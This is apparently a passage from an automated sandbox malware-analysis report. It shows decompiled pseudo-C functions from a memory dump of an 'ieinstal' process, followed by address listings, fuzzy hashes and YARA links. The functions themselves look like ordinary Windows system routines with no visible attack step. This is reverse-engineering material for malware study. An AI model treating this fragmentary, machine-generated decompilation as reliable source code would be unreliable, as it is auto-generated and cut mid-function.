					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E1ED27D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E1ED87016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1edf8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1edf7b00; // 0x0
							asm("ror esi, cl");
							 *0x1edfb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E1ED495D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E1ED17F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                        0x1ed303f1
                        0x1ed303f7
                        0x1ed303f9
                        0x1ed303fb
                        0x1ed303fd
                        0x1ed30400
                        0x1ed3040a
                        0x1ed74c7a
                        0x1ed30537
                        0x1ed30547
                        0x1ed30410
                        0x1ed30410
                        0x1ed30414
                        0x1ed30417
                        0x1ed3041a
                        0x1ed30421
                        0x1ed30424
                        0x1ed3042b
                        0x1ed3043b
                        0x1ed3043e
                        0x1ed3043f
                        0x1ed3043f
                        0x1ed30446
                        0x1ed30449
                        0x1ed3044c
                        0x1ed3044f
                        0x1ed30459
                        0x1ed74c8d
                        0x1ed3045f
                        0x1ed3045f
                        0x1ed3045f
                        0x1ed30467
                        0x1ed74c97
                        0x1ed74c9d
                        0x1ed74ca4
                        0x1ed74caa
                        0x1ed74caf
                        0x1ed74cb1
                        0x1ed74cc3
                        0x1ed74cb3
                        0x1ed74cbc
                        0x1ed74cbc
                        0x1ed74cc8
                        0x1ed74ccb
                        0x1ed74cd7
                        0x1ed74cda
                        0x1ed74cdf
                        0x1ed74cdf
                        0x1ed74ccb
                        0x1ed74ca4
                        0x1ed3046d
                        0x1ed3046f
                        0x1ed3046f
                        0x1ed30471
                        0x1ed30476
                        0x1ed3047a
                        0x1ed3047b
                        0x1ed30483
                        0x1ed30489
                        0x1ed3048d
                        0x00000000
                        0x00000000
                        0x1ed74ce9
                        0x1ed74cef
                        0x1ed74d22
                        0x1ed74d22
                        0x00000000
                        0x1ed74d22
                        0x1ed74cf1
                        0x1ed74cf7
                        0x00000000
                        0x00000000
                        0x1ed74cf9
                        0x1ed74cff
                        0x00000000
                        0x00000000
                        0x1ed74d05
                        0x1ed74d07
                        0x00000000
                        0x00000000
                        0x1ed74d0d
                        0x1ed74d0f
                        0x1ed74d14
                        0x1ed74d16
                        0x00000000
                        0x00000000
                        0x1ed74d1c
                        0x1ed74d1c
                        0x1ed30499
                        0x1ed30535
                        0x1ed30535
                        0x00000000
                        0x1ed30535
                        0x1ed304a6
                        0x1ed74d2c
                        0x1ed74d37
                        0x1ed74d39
                        0x1ed74d3b
                        0x00000000
                        0x00000000
                        0x1ed74d41
                        0x1ed74d48
                        0x1ed30527
                        0x1ed3052b
                        0x1ed3052d
                        0x1ed30530
                        0x1ed30530
                        0x00000000
                        0x1ed3052b
                        0x1ed74d4e
                        0x1ed304ac
                        0x1ed304ac
                        0x1ed304af
                        0x1ed304b2
                        0x1ed304b7
                        0x1ed304b9
                        0x1ed304bb
                        0x1ed304bd
                        0x1ed304bf
                        0x1ed304c5
                        0x1ed304c9
                        0x1ed74d53
                        0x1ed74d59
                        0x1ed74db9
                        0x1ed74dba
                        0x1ed74dbf
                        0x1ed74dc2
                        0x1ed74dc4
                        0x1ed74dc7
                        0x1ed74dce
                        0x00000000
                        0x1ed74dce
                        0x1ed74d5b
                        0x1ed74d61
                        0x00000000
                        0x00000000
                        0x1ed74d63
                        0x1ed74d69
                        0x00000000
                        0x00000000
                        0x1ed74d6b
                        0x1ed74d6e
                        0x1ed74d74
                        0x1ed74d76
                        0x1ed74d7c
                        0x1ed74d7e
                        0x1ed74d84
                        0x1ed74d89
                        0x1ed74d8c
                        0x1ed74d8d
                        0x1ed74d92
                        0x1ed74d95
                        0x1ed74d96
                        0x1ed74d98
                        0x1ed74d9a
                        0x1ed74d9f
                        0x1ed74da4
                        0x1ed74da6
                        0x1ed74da8
                        0x1ed74daf
                        0x1ed74db1
                        0x1ed74db1
                        0x1ed74daf
                        0x1ed74da6
                        0x1ed74d84
                        0x1ed74d7c
                        0x00000000
                        0x1ed74d74
                        0x1ed304d6
                        0x1ed74de1
                        0x1ed304dc
                        0x1ed304dc
                        0x1ed304dc
                        0x1ed304e4
                        0x1ed74deb
                        0x1ed74df1
                        0x1ed74df8
                        0x1ed74dfe
                        0x1ed74e03
                        0x1ed74e05
                        0x1ed74e17
                        0x1ed74e07
                        0x1ed74e10
                        0x1ed74e10
                        0x1ed74e1c
                        0x1ed74e1f
                        0x1ed74e35
                        0x1ed74e35
                        0x1ed74e1f
                        0x1ed74df8
                        0x1ed304f1
                        0x1ed304fa
                        0x1ed74e3f
                        0x1ed74e47
                        0x1ed74e5b
                        0x1ed74e61
                        0x1ed74e67
                        0x1ed74e69
                        0x1ed74e71
                        0x1ed74e73
                        0x1ed30500
                        0x1ed30500
                        0x1ed30500
                        0x1ed304fa
                        0x1ed30508
                        0x1ed3051d
                        0x1ed3051d
                        0x1ed3051f
                        0x1ed30524
                        0x00000000
                        0x1ed30524
                        0x1ed30515
                        0x1ed30517
                        0x1ed74e7a
                        0x1ed74e7c
                        0x00000000
                        0x00000000
                        0x1ed74e85
                        0x00000000
                        0x1ed74e85
                        0x00000000
                        0x1ed30517

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 80e90ad65d7e1d03b81f838fe492f276909af562bbaf2a64c3f3fe6fdce3c849
                        • Instruction ID: fcec4c2664b09c03c175cfff76e255d5463c281402c33a1e225ff3ddca896208
                        • Opcode Fuzzy Hash: 80e90ad65d7e1d03b81f838fe492f276909af562bbaf2a64c3f3fe6fdce3c849
                        • Instruction Fuzzy Hash: 89918C71E00295AFEB22CB69C854B9E7BB6EF01728F250361E991EB2D0DB74DD00C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED0C600, Relevance: .2, Instructions: 225COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E1ED0C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x1edfd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E1ED16D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E1ED4B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1edf7b9c; // 0x0
					_t74 = L1ED24620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E1ED49650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L1ED277F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E1ED4F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E1ED413C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L1ED277F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E1ED49650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                        0x1ed0c608
                        0x1ed0c615
                        0x1ed0c625
                        0x1ed0c62d
                        0x1ed0c635
                        0x1ed0c640
                        0x1ed0c680
                        0x1ed0c687
                        0x1ed0c688
                        0x1ed0c689
                        0x1ed0c694
                        0x1ed0c694
                        0x1ed0c642
                        0x1ed0c64a
                        0x1ed0c697
                        0x1ed77a25
                        0x1ed77a2b
                        0x1ed77a2e
                        0x1ed77a30
                        0x1ed77bea
                        0x1ed77bea
                        0x00000000
                        0x1ed77bea
                        0x1ed77a36
                        0x1ed77a43
                        0x1ed77a48
                        0x1ed77a4c
                        0x1ed77a4e
                        0x00000000
                        0x00000000
                        0x1ed77a58
                        0x1ed77a5a
                        0x1ed77a5b
                        0x1ed77a5c
                        0x1ed77a5d
                        0x1ed77a63
                        0x1ed77a64
                        0x1ed77a6a
                        0x1ed77a6c
                        0x1ed77a6e
                        0x1ed779cb
                        0x1ed779cb
                        0x1ed779ce
                        0x1ed779d0
                        0x1ed77a98
                        0x1ed77a9b
                        0x1ed77a9b
                        0x1ed77a9e
                        0x1ed77aa1
                        0x1ed77bbe
                        0x1ed77bbe
                        0x1ed77bc0
                        0x1ed77be0
                        0x1ed77be0
                        0x1ed77a01
                        0x1ed77a01
                        0x1ed77a05
                        0x1ed77a07
                        0x1ed77a15
                        0x1ed77a15
                        0x1ed77a1a
                        0x00000000
                        0x1ed77a1a
                        0x1ed77bc2
                        0x1ed77bc6
                        0x1ed77bc9
                        0x1ed77bcd
                        0x1ed77bcf
                        0x1ed779e6
                        0x1ed779e6
                        0x1ed779eb
                        0x1ed779eb
                        0x1ed779ef
                        0x1ed779f1
                        0x00000000
                        0x00000000
                        0x1ed779f3
                        0x1ed779f5
                        0x1ed779ff
                        0x1ed779ff
                        0x00000000
                        0x1ed779ff
                        0x1ed779f7
                        0x1ed779fd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed779fd
                        0x1ed77bd5
                        0x1ed77bd8
                        0x00000000
                        0x00000000
                        0x1ed77ba9
                        0x1ed77bac
                        0x1ed77bb0
                        0x1ed77bb1
                        0x1ed77bb1
                        0x1ed77bb6
                        0x00000000
                        0x1ed77bb6
                        0x1ed77aa7
                        0x1ed77aaa
                        0x00000000
                        0x00000000
                        0x1ed77ab2
                        0x1ed77ab3
                        0x1ed77ab5
                        0x1ed77aec
                        0x1ed77aef
                        0x1ed77b25
                        0x1ed77b28
                        0x1ed77b62
                        0x1ed77b64
                        0x1ed77b8f
                        0x1ed77b92
                        0x1ed77b96
                        0x1ed77b98
                        0x00000000
                        0x00000000
                        0x1ed77b9e
                        0x1ed77b9f
                        0x1ed77ba3
                        0x00000000
                        0x1ed77ba3
                        0x1ed77b66
                        0x1ed77b68
                        0x1ed77ae2
                        0x1ed77ae2
                        0x00000000
                        0x1ed77ae2
                        0x1ed77b6e
                        0x1ed77b72
                        0x1ed77b75
                        0x1ed77b81
                        0x1ed77b85
                        0x1ed77b87
                        0x00000000
                        0x00000000
                        0x1ed77b31
                        0x1ed77b34
                        0x1ed77b3c
                        0x1ed77b45
                        0x1ed77b46
                        0x1ed77b4f
                        0x1ed77b51
                        0x1ed77b57
                        0x1ed77b59
                        0x1ed77b59
                        0x00000000
                        0x1ed77b59
                        0x1ed77b77
                        0x00000000
                        0x1ed77b77
                        0x1ed77b2a
                        0x00000000
                        0x1ed77b2a
                        0x1ed77af1
                        0x1ed77af3
                        0x00000000
                        0x00000000
                        0x1ed77afb
                        0x1ed77afc
                        0x1ed77afe
                        0x00000000
                        0x00000000
                        0x1ed77b00
                        0x1ed77b03
                        0x00000000
                        0x00000000
                        0x1ed77b05
                        0x1ed77b09
                        0x1ed77b0d
                        0x1ed77b0f
                        0x00000000
                        0x00000000
                        0x1ed77b18
                        0x1ed77b1d
                        0x00000000
                        0x1ed77b1d
                        0x1ed77ab7
                        0x1ed77ab9
                        0x00000000
                        0x00000000
                        0x1ed77abf
                        0x1ed77ac1
                        0x00000000
                        0x00000000
                        0x1ed77ac3
                        0x1ed77ac6
                        0x00000000
                        0x00000000
                        0x1ed77ac8
                        0x1ed77acc
                        0x1ed77ad0
                        0x1ed77ad2
                        0x00000000
                        0x00000000
                        0x1ed77adb
                        0x00000000
                        0x1ed77adb
                        0x1ed779d6
                        0x1ed779d9
                        0x1ed779dc
                        0x1ed77a91
                        0x1ed77a94
                        0x00000000
                        0x1ed77a94
                        0x1ed779e2
                        0x00000000
                        0x1ed779e2
                        0x1ed77a74
                        0x1ed77a7a
                        0x00000000
                        0x00000000
                        0x1ed77a8a
                        0x1ed77a21
                        0x1ed77a21
                        0x00000000
                        0x1ed77a21
                        0x1ed0c650
                        0x1ed0c651
                        0x1ed0c656
                        0x1ed0c65c
                        0x1ed0c65d
                        0x1ed0c663
                        0x1ed0c664
                        0x1ed0c66a
                        0x1ed0c66e
                        0x1ed779c5
                        0x1ed779c7
                        0x00000000
                        0x1ed779c7
                        0x1ed0c67a
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d14d35c2282540fed27bc1a63fd17a0642118a63abc53b67e5b731095cc0c35
                        • Instruction ID: 073bc940f385da74c8ea18edeee6542f340890cbe0ee69063a006437e8dd56f4
                        • Opcode Fuzzy Hash: 2d14d35c2282540fed27bc1a63fd17a0642118a63abc53b67e5b731095cc0c35
                        • Instruction Fuzzy Hash: 8481A075A142428BDB11CF14C890A6B77E6EF84259F164F2EFD899B244E330ED45CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED86DC9, Relevance: .2, Instructions: 199COMMON
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E1ED86DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E1ED86B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E1ED27D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E1ED49AE0();
					_t87 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E1ED8795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E1ED8795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E1ED8795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E1ED8795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L1ED24620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E1ED86B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E1ED86B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E1ED86B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E1ED86B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E1ED27D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E1ED49AE0();
								L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L1ED22400( &_v36);
							if(_v24 >= 0) {
								_t87 = L1ED22400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L1ED22400( &_v52);
							}
							if(_v28 >= 0) {
								return L1ED22400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                        0x1ed86dd4
                        0x1ed86dde
                        0x1ed86de1
                        0x1ed86de3
                        0x1ed86de6
                        0x1ed86de9
                        0x1ed86dec
                        0x1ed86def
                        0x1ed86df2
                        0x1ed86df5
                        0x1ed86dfe
                        0x1ed86e04
                        0x1ed86e09
                        0x1ed86e0d
                        0x1ed86e18
                        0x1ed86e1b
                        0x1ed86e22
                        0x1ed86e2d
                        0x1ed86e30
                        0x1ed86e36
                        0x1ed86e42
                        0x1ed86e4d
                        0x1ed86e50
                        0x1ed86e55
                        0x1ed86e5c
                        0x1ed86e6e
                        0x1ed86e5e
                        0x1ed86e67
                        0x1ed86e67
                        0x1ed86e73
                        0x1ed86e74
                        0x1ed86e77
                        0x1ed86e7c
                        0x1ed86e7d
                        0x1ed86e8e
                        0x1ed86e93
                        0x1ed86e9c
                        0x1ed86ea8
                        0x1ed86eab
                        0x1ed86eac
                        0x1ed86eb3
                        0x1ed86ecd
                        0x1ed86edc
                        0x1ed86ee2
                        0x1ed86ee5
                        0x1ed86ef2
                        0x1ed86efb
                        0x1ed86f01
                        0x1ed86f06
                        0x1ed86f0b
                        0x1ed86f11
                        0x1ed86f1a
                        0x1ed86f22
                        0x1ed86f26
                        0x1ed86f26
                        0x1ed86f33
                        0x1ed86f41
                        0x1ed86f44
                        0x1ed86f47
                        0x1ed86f54
                        0x1ed86f65
                        0x1ed86f77
                        0x1ed86f7c
                        0x1ed86f82
                        0x1ed86f91
                        0x1ed86f99
                        0x1ed86fa3
                        0x1ed86fae
                        0x1ed86fae
                        0x1ed86fba
                        0x1ed86fbb
                        0x1ed86fbc
                        0x1ed86fc1
                        0x1ed86fc2
                        0x1ed86fd3
                        0x1ed86fd8
                        0x1ed86fd8
                        0x1ed86fdf
                        0x1ed86fe8
                        0x1ed86fee
                        0x1ed86fee
                        0x1ed86ff5
                        0x1ed86ffb
                        0x1ed86ffb
                        0x1ed87004
                        0x00000000
                        0x1ed8700a
                        0x1ed87004
                        0x1ed86eb3
                        0x1ed86e9c
                        0x1ed87015

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction ID: 7515eb7f209399422dd928ff8d5128e9781cf4d8f0c215d0c6d1d80e7ede473b
                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction Fuzzy Hash: CB715875A00249EFCB11CFA5C980EAEBBB9FF48714F114669E505E7290DB34FA41CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED9B8D0, Relevance: .2, Instructions: 199COMMON
                        Download Yara Rule
                        C-Code - Quality: 39%
                        			E1ED9B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1edf7b9c; // 0x0
				_t124 = L1ED24620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E1ED49800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E1ED495B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E1ED495D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L1ED277F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E1ED49910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
